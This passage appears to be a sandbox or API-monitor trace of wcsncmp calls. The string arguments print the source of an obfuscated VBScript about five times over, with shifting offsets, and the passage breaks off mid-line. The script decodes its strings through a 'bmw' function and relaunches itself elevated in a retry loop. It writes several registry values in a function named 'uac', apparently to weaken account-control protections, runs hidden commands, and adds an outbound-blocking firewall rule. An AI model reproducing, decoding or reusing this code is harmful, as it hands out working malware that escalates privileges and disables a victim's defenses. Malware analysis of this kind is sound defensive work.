bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.018] wcsncmp (_String1="EUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.018] wcsncmp (_String1="UEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0223.018] wcsncmp (_String1="EN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.018] wcsncmp (_String1="N\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0223.018] wcsncmp (_String1="\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 